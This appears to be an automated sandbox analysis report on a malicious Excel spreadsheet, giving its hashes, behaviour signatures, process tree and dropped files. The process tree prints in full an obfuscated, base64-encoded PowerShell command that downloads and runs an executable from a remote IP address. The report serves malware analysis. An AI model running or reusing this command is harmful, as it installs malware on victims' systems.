Analysis

  • max time kernel
    143s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    19/08/2024, 07:01

General

  • Target

    43690dc5d9b7f1b482a17e0e0d2724881bf36e42da7a67a17371c07ec1276f13.xls

  • Size

    165KB

  • MD5

    5f71bb635bdaa4ba48a9ac0b24b10e0f

  • SHA1

    e0660c41702dbeb2b3092a95edf7ed6ce2a44742

  • SHA256

    43690dc5d9b7f1b482a17e0e0d2724881bf36e42da7a67a17371c07ec1276f13

  • SHA512

    5d09707cce81ed71addef88818c60232c9a3427925f35f7f350b20c5d4c62db1648a76516231e115266d119c118a7e15e7ba736d1d0fda9b8dbcc3c5cb9a85e8

  • SSDEEP

    3072:3DYpmZjeGPLJgJdK/9ahoueCm/V6jP1XHsJOmqdZgox+F/1tNmBT9:zY0TmzKQeV/V6b9tghF/Bc

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\43690dc5d9b7f1b482a17e0e0d2724881bf36e42da7a67a17371c07ec1276f13.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1688
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2864
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C pOWErsHeLL.eXE -Ex BYPAsS -NOp -w 1 -C DevIcecrEDentiaLdeploymeNt.exE ; IeX($(IEx('[sySTem.TeXt.eNcoDINg]'+[cHAR]58+[CHar]58+'uTF8.GetSTRing([sySTem.CoNVerT]'+[chAR]0x3a+[CHar]0x3A+'FROmbAse64stRiNg('+[cHar]34+'JDViQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJkRUZJTml0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtkQUJGdUpVaSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhpck1DY1ZKYyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtJR0xIRmpjLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRnSGhZaUFWTFYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRUERkdHhURkhyeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUFlHQ1V5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNWJBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi4zMS4xMjIvMzUwL2poaV9zZXJ2aWNlLmV4ZSIsIiRFbnY6QVBQREFUQVxqaGlfc2VydmljZS5leGUiLDAsMCk7c3RBcnQtU2xlRXAoMyk7U1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcamhpX3NlcnZpY2UuZXhlIg=='+[cHAR]34+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:824
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOWErsHeLL.eXE -Ex BYPAsS -NOp -w 1 -C DevIcecrEDentiaLdeploymeNt.exE ; IeX($(IEx('[sySTem.TeXt.eNcoDINg]'+[cHAR]58+[CHar]58+'uTF8.GetSTRing([sySTem.CoNVerT]'+[chAR]0x3a+[CHar]0x3A+'FROmbAse64stRiNg('+[cHar]34+'JDViQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJkRUZJTml0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtkQUJGdUpVaSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhpck1DY1ZKYyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtJR0xIRmpjLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRnSGhZaUFWTFYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRUERkdHhURkhyeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUFlHQ1V5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNWJBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi4zMS4xMjIvMzUwL2poaV9zZXJ2aWNlLmV4ZSIsIiRFbnY6QVBQREFUQVxqaGlfc2VydmljZS5leGUiLDAsMCk7c3RBcnQtU2xlRXAoMyk7U1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcamhpX3NlcnZpY2UuZXhlIg=='+[cHAR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1560
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x1potusb.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3020
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD52B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD52A.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2896
        • C:\Users\Admin\AppData\Roaming\jhi_service.exe
          "C:\Users\Admin\AppData\Roaming\jhi_service.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in System32 directory
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1604
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Users\Admin\AppData\Roaming\jhi_service.exe"
            5⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            PID:1240

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files (x86)\Seqwl.lnk

          Filesize

          1KB

          MD5

          3e466ce55cf09a60936d591cef4b7db8

          SHA1

          20b878712015df6b157d7e0d76f90eb861d428a4

          SHA256

          4274b2ec215c9d1a4b96b41e377207d481349890f4519196d5bec3f1fbc130d3

          SHA512

          0c3c245fe6cf4237ea530628aa18ef8024f2f440ed5606dc15068262d45b35a31a3ef47bfaac58a4eac25173b14862d3a1d5f3a4b39477fcc5277733bfa4e109

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          1KB

          MD5

          7fb5fa1534dcf77f2125b2403b30a0ee

          SHA1

          365d96812a69ac0a4611ea4b70a3f306576cc3ea

          SHA256

          33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

          SHA512

          a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          436B

          MD5

          971c514f84bba0785f80aa1c23edfd79

          SHA1

          732acea710a87530c6b08ecdf32a110d254a54c8

          SHA256

          f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

          SHA512

          43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          174B

          MD5

          b01d9b5a2fcfb5ba6d70ff6f71aad509

          SHA1

          b549a41028844e00400dccfa75dc56ffbc6d8d37

          SHA256

          459a0650dd8c852a4c16d1f5232580da8a75cdc9dad156362ce70fc9f208a98e

          SHA512

          4ffdf014dc23ff286a38e20ff078becde34ce68924422a970de61dfce5e6bdf8372656f03c4555ecd352ce82e6413a1a208d68fd605d3691feeff1d12b6312e4

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          170B

          MD5

          4d2e4f6a1ebe2d11fd59d5e84ab4effc

          SHA1

          8da37d992a027eb2eed65bb22c5c80ab0e21c432

          SHA256

          063f80aaede047a11f28ef349d4c45a03bf246c1d8f6513554dd89fbfb648836

          SHA512

          d5a5652694dc09f12b6d7078c9807e6cf1b3931dd4b8a1f6fdc3f9712629699b251e8497073b3039ec02151701d61f9862c2dc5b998a87087b7662d6b1913d9e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M7GT0RRO\350[1].hta

          Filesize

          8KB

          MD5

          09d9ed20377eebea6873be3c495e79c6

          SHA1

          b4376335c2203355bae4fcffbbd63342c1184fd9

          SHA256

          de5f70be7c48b8fd3e63a13d575e092aa101b8a55e906c8afa937fbd8512ad61

          SHA512

          47bdeba06bdce6d05e8d24411a3aeb2e101425c1adb2af2a6661dc1d0176998c15c094fbbc34f5e678078a0d9daf8167b40542186f90b4a16efd019cda764077

        • C:\Users\Admin\AppData\Local\Temp\CabCA51.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\RESD52B.tmp

          Filesize

          1KB

          MD5

          58f6aaa4f0b980106ed71026e345485c

          SHA1

          6119522e5e7aa012be81e61ecc4181923316d1da

          SHA256

          045dc244aea338308ffa49013d605c6806023cfe6045d587d85648b7a7420878

          SHA512

          21be5f6cefcd1d653941855959256ab784047b28932dfe9192a9b529ff810a2e6bf184c2bb04a457c31e7106454e05013715c05ba801c60734222a6e2b3ff063

        • C:\Users\Admin\AppData\Local\Temp\nsyF8C1.tmp\System.dll

          Filesize

          12KB

          MD5

          d6f54d2cefdf58836805796f55bfc846

          SHA1

          b980addc1a755b968dd5799179d3b4f1c2de9d2d

          SHA256

          f917aef484d1fbb4d723b2e2d3045cb6f5f664e61fbb3d5c577bd1c215de55d9

          SHA512

          ce67da936a93d46ef7e81abc8276787c82fd844c03630ba18afc3528c7e420c3228bfe82aeda083bb719f2d1314afae913362abd1e220cb364606519690d45db

        • C:\Users\Admin\AppData\Local\Temp\x1potusb.dll

          Filesize

          3KB

          MD5

          27126286784e041f4e1d1264976257dc

          SHA1

          fa7607457aa6bf038765a1d4243f90d2494826a0

          SHA256

          71b3950941518c50332cbcd9b520a652ea33d8282f49cbf0a440e2ee2ba2cca4

          SHA512

          b264e9996e5b8dc78b2ed4914d67764c45b5bb01a3d8d874f55b9a73cf2b388b3f032f251ec81b8129b98a388a7ca6bb216689a247f5f30f9f5ea1aaf25b0b57

        • C:\Users\Admin\AppData\Local\Temp\x1potusb.pdb

          Filesize

          7KB

          MD5

          b49c45934c1c6ca68756d1a016e7a1a5

          SHA1

          70be7b577756171de7da7b655a1b0c688937d95f

          SHA256

          cec10aebc7f9ce568a43f0d8f385973fb1802e20400828ba85b6478b6964fc23

          SHA512

          bc8fea5eef921f42af4cd43931c9a9745b90e638ba16ad6654a0be619f39b57fedf5648c495847828445bbcad4291f8ba192a4cd9d73083abb749a9edd346095

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CHI4MA0M.txt

          Filesize

          68B

          MD5

          13f2aad623df207a2f601f18a81e1f23

          SHA1

          872c02a9cc5182b15aeab2fdd9f7482b587d2677

          SHA256

          e53c6f506773973fdca123ebb0ce75c843697f48b1f28e168bcd81a6c359e6eb

          SHA512

          69c74f768eebbfc9e4c8a6a863654a6f3e4eba2b027255bd9da9961b659f942ba99c87c630ff1caf91efbbfba8f6212b406446c74302a91cf117fc68c0955aab

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\edelgave.ini

          Filesize

          37B

          MD5

          3c65c480cb76aed4490bdad661de772f

          SHA1

          fc958ead2e23238bdbf62a685786f48fb82fb579

          SHA256

          362c08bc271b256001720882dea6b6ea8bb7ba7a330f59c86d2353266c59c932

          SHA512

          0629e4cb1fa3b58ea4f3773a54616c6f1d9336e295154d7a8d9bbb7bd9c5bcbc82babb369ea0f658b1dca4533fb5a377f750ef0bde137dd30949ad3264ad9d5e

        • C:\Users\Admin\AppData\Roaming\jhi_service.exe

          Filesize

          532KB

          MD5

          64eb445a3c537c54bef79e20186f2375

          SHA1

          0004384b5670cd938ae2f49612fa76e16ff03984

          SHA256

          18c704efaf97424df755db04f87717fcb043413bd4cf4805a5727aa04486a6f0

          SHA512

          250d04b84abe83b70784461c448f169fc035fa389f9388d66b56f1af007bd7aefdf40d5849ef9a690bc6c6c30f968ff19f19ec8cfa74a0f5f3763cfd762d2c0f

        • \??\c:\Users\Admin\AppData\Local\Temp\CSCD52A.tmp

          Filesize

          652B

          MD5

          6e31bd8c8234ce50419a5122e66e91fc

          SHA1

          e375f711cec8c49e3059e497b3e2a4d20db6d3b8

          SHA256

          2b95367d72b60e710bbf593c021aae670b2cdc9df5b55956e7933cada7829a8e

          SHA512

          3ccd6804290db8481348391588cb780a526fa7458dbaeed23ecd84fb3eb6bafcb9faf6c9d5451f3506edeb6522e1ad10fdb5606cad18a28b65f93cf8836d39bc

        • \??\c:\Users\Admin\AppData\Local\Temp\x1potusb.0.cs

          Filesize

          481B

          MD5

          874bccfdc3211eff1fb5e354041b1ecf

          SHA1

          87744cd9350d81fc54e4bde73c7a64cd6e1350b6

          SHA256

          9db9e5fc349e5077b8965e37a6cddc09a85bf320d3abbc9918adb8544e3e38de

          SHA512

          3817b2274f855be98b856b08705b9122c034abe91a76d2ac91c7f54cbceb34bc9686d5682090e47bb7823580527c9515609020ac51629fe7e4ed942b14ac9641

        • \??\c:\Users\Admin\AppData\Local\Temp\x1potusb.cmdline

          Filesize

          309B

          MD5

          28e378cae333b2c3b81cc820c10bc5dc

          SHA1

          3d135a6c7abbbfeb1b90a0c3f22afd5c9c203712

          SHA256

          49f963e70b6f45b102e2da74f9b53e24951c4831316e196f0b746174d9be13a5

          SHA512

          a05ff661021bc9a937de8c70418b8511c7387fcec85efaa2e363c7b78e4a18f0895bba572ca5122bef93fd6b544710e2c8f73d39307f0aa569d21a8605f2a4c1

        • \Users\Admin\AppData\Local\Temp\nsyF8C1.tmp\LangDLL.dll

          Filesize

          5KB

          MD5

          232f16c1cb21335fbce6f78ddaf2458c

          SHA1

          1c5981b852b3b640c98547074bda081c38859c3f

          SHA256

          507df75c959e1c9a89febb3f5d5963539895d9a602f4e6ca7898079919a83352

          SHA512

          cb8fb45ffe04e759816cb931223aafa42c15e58f1b35717f59a14c665aa94b48c393ff1a18ac480165ab090fed9226111ae2c3f4e9aead413a105c6f15515227

        • memory/1240-982-0x0000000000F80000-0x0000000001FE2000-memory.dmp

          Filesize

          16.4MB

        • memory/1688-53-0x00000000723DD000-0x00000000723E8000-memory.dmp

          Filesize

          44KB

        • memory/1688-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/1688-18-0x0000000002D60000-0x0000000002D62000-memory.dmp

          Filesize

          8KB

        • memory/1688-1-0x00000000723DD000-0x00000000723E8000-memory.dmp

          Filesize

          44KB

        • memory/1688-989-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/1688-992-0x00000000723DD000-0x00000000723E8000-memory.dmp

          Filesize

          44KB

        • memory/2864-17-0x0000000002480000-0x0000000002482000-memory.dmp

          Filesize

          8KB